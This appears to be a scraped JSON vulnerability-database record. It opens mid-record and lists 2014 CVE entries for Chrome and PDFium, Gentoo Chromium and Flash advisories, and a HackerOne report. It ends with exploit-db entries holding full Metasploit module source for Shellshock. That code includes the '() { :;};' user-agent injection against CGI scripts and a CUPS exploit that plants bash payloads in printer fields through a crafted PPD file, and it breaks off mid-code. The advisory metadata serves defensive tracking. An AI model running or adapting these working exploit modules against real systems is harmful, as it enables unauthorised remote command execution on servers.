https://launchpad.net/ubuntu/+source/oxide-qt/1.3.4-0ubuntu0.14.10.1\r\n https://launchpad.net/ubuntu/+source/oxide-qt/1.3.4-0ubuntu0.14.04.1\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31430", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31430", "title": "[USN-2410-1] Oxide vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2021-02-02T06:14:34", "description": "Integer overflow in the opj_t2_read_packet_data function in fxcodec/fx_libopenjpeg/libopenjpeg20/t2.c in OpenJPEG in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a long segment in a JPEG image.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7901", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7901"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7901", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Use-after-free vulnerability in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PDF document.", "edition": 4, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7902", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7902"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.63"], "id": "CVE-2014-7902", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7902", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.63:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Google Chrome before 39.0.2171.65 on Android does not prevent navigation to a URL in cases where an intent for the URL lacks CATEGORY_BROWSABLE, which allows remote attackers to bypass intended access restrictions via a crafted web site.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7905", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7905"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7905", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:android:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Use-after-free vulnerability in the CPDF_Parser::IsLinearizedFile function in fpdfapi/fpdf_parser/fpdf_parser_parser.cpp in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PDF document.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7900", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7900"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7900", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7900", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Buffer overflow in Skia, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7904", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7904"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7904", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Google Chrome before 38.0.2125.101 allows remote attackers to spoof the address bar by placing a blob: substring at the beginning of the URL, followed by the original URI scheme and a long username string.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7899", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7899"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:38.0.2125.7"], "id": "CVE-2014-7899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7899", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:google:chrome:38.0.2125.7:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Buffer overflow in OpenJPEG before r2911 in PDFium, as used in Google Chrome before 39.0.2171.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted JPEG image.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7903", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7903"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7903", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7903", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Multiple use-after-free vulnerabilities in modules/screen_orientation/ScreenOrientationController.cpp in Blink, as used in Google Chrome before 39.0.2171.65, allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger improper handling of a detached frame, related to the (1) lock and (2) unlock methods.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7907", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7907"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7907", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7907", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "Use-after-free vulnerability in the Pepper plugins in Google Chrome before 39.0.2171.65 allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Flash content that triggers an attempted PepperMediaDeviceManager access outside of the object's lifetime.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7906", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7906"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7906", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "effects/SkDashPathEffect.cpp in Skia, as used in Google Chrome before 39.0.2171.65, computes a hash key using uninitialized integer values, which might allow remote attackers to cause a denial of service by rendering crafted data.", "edition": 6, "cvss3": {}, "published": "2014-11-19T11:59:00", "title": "CVE-2014-7909", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7909"], "modified": "2017-09-08T01:29:00", "cpe": ["cpe:/a:google:chrome:39.0.2171.45"], "id": "CVE-2014-7909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7909", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:google:chrome:39.0.2171.45:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:21", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3200", "CVE-2014-7899", "CVE-2014-3192", "CVE-2014-3193", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-3194", "CVE-2014-3198", "CVE-2014-7901", "CVE-2014-3199", "CVE-2014-7903", "CVE-2014-3189", "CVE-2014-3191", "CVE-2014-7910", "CVE-2014-3195", "CVE-2014-3197", "CVE-2014-3190", "CVE-2014-3188", "CVE-2014-7902", "CVE-2014-7900"], "edition": 1, "description": "### Background\n\nChromium is an open-source web browser project.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-39.0.2171.65\"", "modified": "2014-12-13T00:00:00", "published": "2014-12-13T00:00:00", "id": "GLSA-201412-13", "href": "https://security.gentoo.org/glsa/201412-13", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:30", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0558", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-0564", "CVE-2014-8441"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.418\"", "modified": "2014-11-21T00:00:00", "published": "2014-11-21T00:00:00", "id": "GLSA-201411-06", "href": "https://security.gentoo.org/glsa/201411-06", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2019-11-20T17:03:06", "bulletinFamily": "bugbounty", "bounty": 10000.0, "cvelist": ["CVE-2014-0574"], "description": "The issue occurs while sharing a bytearray between two workers. If both call bytearray.clear() at the same time, Flash does not correctly handle the race and may double free the array.\r\n\r\nIndentified as CVE-2014-0574, and reported to Adobe via Chrome VRP:\r\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-24.html\r\n\r\nOriginal report with proof of concept:\r\nhttps://code.google.com/p/chromium/issues/detail?id=423703", "modified": "2019-11-12T09:44:15", "published": "2014-11-24T08:10:24", "id": "H1:37240", "href": "https://hackerone.com/reports/37240", "type": "hackerone", "title": "Flash (IBB): Race condition in Flash workers may cause an exploitabl\u200be double free", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T23:55:10", "description": "GNU bash Environment Variable Command Injection (MSF). CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE...", "published": "2014-09-25T00:00:00", "type": "exploitdb", "title": "GNU bash Environment Variable Command Injection MSF", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34777", "href": "https://www.exploit-db.com/exploits/34777/", "sourceData": " require 'msf/core'\r\n\r\n class Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'bashedCgi',\r\n 'Description' => %q{\r\n Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. \r\n },\r\n 'Author' => \r\n [ \r\n 'Stephane Chazelas', # vuln discovery \r\n 'Shaun Colley <scolley at ioactive.com>' # metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [ 'CVE', '2014-6271' ],\r\n 'Targets' => \r\n [\r\n [ 'cgi', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 0 } \r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),\r\n OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])\r\n ], self.class)\r\n end\r\n\r\n def run \r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['TARGETURI'],\r\n 'agent' => \"() { :;}; \" + datastore['CMD']\r\n })\r\n\r\n if res && res.code == 200\r\n print_good(\"Command sent - 200 received\")\r\n else\r\n print_error(\"Command sent - non-200 reponse\")\r\n end\r\n end\r\n end\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34777/"}, {"lastseen": "2016-02-04T00:39:00", "description": "CUPS Filter Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-...", "published": "2014-10-29T00:00:00", "type": "exploitdb", "title": "CUPS Filter Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-29T00:00:00", "id": "EDB-ID:35115", "href": "https://www.exploit-db.com/exploits/35115/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CUPS Filter Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n This module exploits a post-auth code injection in specially crafted\r\n environment variables in Bash, specifically targeting CUPS filters\r\n through the PRINTER_INFO and PRINTER_LOCATION variables by default.\r\n },\r\n 'Author' => [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'lcamtuf', # CVE-2014-6278\r\n 'Brendan Coles <bcoles[at]gmail.com>' # msf\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-6271'],\r\n ['CVE', '2014-6278'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://access.redhat.com/articles/1200223'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649']\r\n ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\\x0A\\x0D\",\r\n 'DisableNops' => true\r\n },\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic bash awk ruby'\r\n },\r\n # Tested:\r\n # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)\r\n # - CUPS version 1.5.3 on Debian 7 (x64)\r\n # - CUPS version 1.6.2 on Fedora 19 (x64)\r\n # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)\r\n 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014',\r\n 'License' => MSF_LICENSE\r\n ))\r\n register_options([\r\n Opt::RPORT(631),\r\n OptBool.new('SSL', [ true, 'Use SSL', true ]),\r\n OptString.new('USERNAME', [ true, 'CUPS username', 'root']),\r\n OptString.new('PASSWORD', [ true, 'CUPS user password', '']),\r\n OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),\r\n OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # CVE-2014-6271\r\n #\r\n def cve_2014_6271(cmd)\r\n %{() { :;}; $(#{cmd}) & }\r\n end\r\n\r\n #\r\n # CVE-2014-6278\r\n #\r\n def cve_2014_6278(cmd)\r\n %{() { _; } >_[$($())] { echo -e \"\\r\\n$(#{cmd})\\r\\n\" ; }}\r\n end\r\n\r\n #\r\n # Check credentials\r\n #\r\n def check\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n res = add_printer(printer_name, '')\r\n if !res\r\n vprint_error(\"#{peer} - No response from host\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.headers['Server'] =~ /CUPS\\/([\\d\\.]+)/\r\n vprint_status(\"#{peer} - Found CUPS version #{$1}\")\r\n else\r\n print_status(\"#{peer} - Target is not a CUPS web server\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n if res.body =~ /Set Default Options for #{printer_name}/\r\n vprint_good(\"#{peer} - Added printer successfully\")\r\n delete_printer(printer_name)\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_error(\"#{peer} - Authentication failed\")\r\n elsif res.code == 426\r\n vprint_error(\"#{peer} - SSL required - set SSL true\")\r\n end\r\n Exploit::CheckCode::Detected\r\n end\r\n\r\n #\r\n # Exploit\r\n #\r\n def exploit\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n\r\n # Select target CVE\r\n case datastore['CVE']\r\n when 'CVE-2014-6278'\r\n cmd = cve_2014_6278(payload.raw)\r\n else\r\n cmd = cve_2014_6271(payload.raw)\r\n end\r\n\r\n # Add a printer containing the payload\r\n # with a CUPS filter pointing to /bin/bash\r\n res = add_printer(printer_name, cmd)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add printer - Connection failed.\")\r\n elsif res.body =~ /Set Default Options for #{printer_name}/\r\n print_good(\"#{peer} - Added printer successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add printer - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add printer - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add printer.\")\r\n end\r\n\r\n # Add a test page to the print queue.\r\n # The print job triggers execution of the bash filter\r\n # which executes the payload in the environment variables.\r\n res = print_test_page(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add test page to print queue - Connection failed.\")\r\n elsif res.body =~ /Test page sent; job ID is/\r\n vprint_good(\"#{peer} - Added test page to printer queue\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add test page to print queue - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add test page to print queue - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add test page to print queue.\")\r\n end\r\n\r\n # Delete the printer\r\n res = delete_printer(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not delete printer - Connection failed.\")\r\n elsif res.body =~ /has been deleted successfully/\r\n print_status(\"#{peer} - Deleted printer '#{printer_name}' successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.\")\r\n elsif res.code == 426\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.\")\r\n else\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}'\")\r\n end\r\n end\r\n\r\n #\r\n # Add a printer to CUPS\r\n #\r\n def add_printer(printer_name, cmd)\r\n vprint_status(\"#{peer} - Adding new printer '#{printer_name}'\")\r\n\r\n ppd_name = \"#{rand_text_alphanumeric(10 + rand(5))}.ppd\"\r\n ppd_file = <<-EOF\r\n*PPD-Adobe: \"4.3\"\r\n*%==== General Information Keywords ========================\r\n*FormatVersion: \"4.3\"\r\n*FileVersion: \"1.00\"\r\n*LanguageVersion: English\r\n*LanguageEncoding: ISOLatin1\r\n*PCFileName: \"#{ppd_name}\"\r\n*Manufacturer: \"Brother\"\r\n*Product: \"(Brother MFC-3820CN)\"\r\n*1284DeviceID: \"MFG:Brother;MDL:MFC-3820CN\"\r\n*cupsVersion: 1.1\r\n*cupsManualCopies: False\r\n*cupsFilter: \"application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash\"\r\n*cupsModelNumber: #{rand(10) + 1}\r\n*ModelName: \"Brother MFC-3820CN\"\r\n*ShortNickName: \"Brother MFC-3820CN\"\r\n*NickName: \"Brother MFC-3820CN CUPS v1.1\"\r\n*%\r\n*%==== Basic Device Capabilities =============\r\n*LanguageLevel: \"3\"\r\n*ColorDevice: True\r\n*DefaultColorSpace: RGB\r\n*FileSystem: False\r\n*Throughput: \"12\"\r\n*LandscapeOrientation: Plus90\r\n*VariablePaperSize: False\r\n*TTRasterizer: Type42\r\n*FreeVM: \"1700000\"\r\n\r\n*DefaultOutputOrder: Reverse\r\n*%==== Media Selection ======================\r\n\r\n*OpenUI *PageSize/Media Size: PickOne\r\n*OrderDependency: 18 AnySetup *PageSize\r\n*DefaultPageSize: BrLetter\r\n*PageSize BrA4/A4: \"<</PageSize[595 842]/ImagingBBox null>>setpagedevice\"\r\n*PageSize BrLetter/Letter: \"<</PageSize[612 792]/ImagingBBox null>>setpagedevice\"\r\nEOF\r\n\r\n pd = Rex::MIME::Message.new\r\n pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name=\"PPD_FILE\"; filename=\"#{ppd_name}\"))\r\n pd.add_part(\"#{@cookie}\", nil, nil, %(form-data; name=\"org.cups.sid\"))\r\n pd.add_part(\"add-printer\", nil, nil, %(form-data; name=\"OP\"))\r\n pd.add_part(\"#{printer_name}\", nil, nil, %(form-data; name=\"PRINTER_NAME\"))\r\n pd.add_part(\"\", nil, nil, %(form-data; name=\"PRINTER_INFO\")) # injectable\r\n pd.add_part(\"#{cmd}\", nil, nil, %(form-data; name=\"PRINTER_LOCATION\")) # injectable\r\n pd.add_part(\"file:///dev/null\", nil, nil, %(form-data; 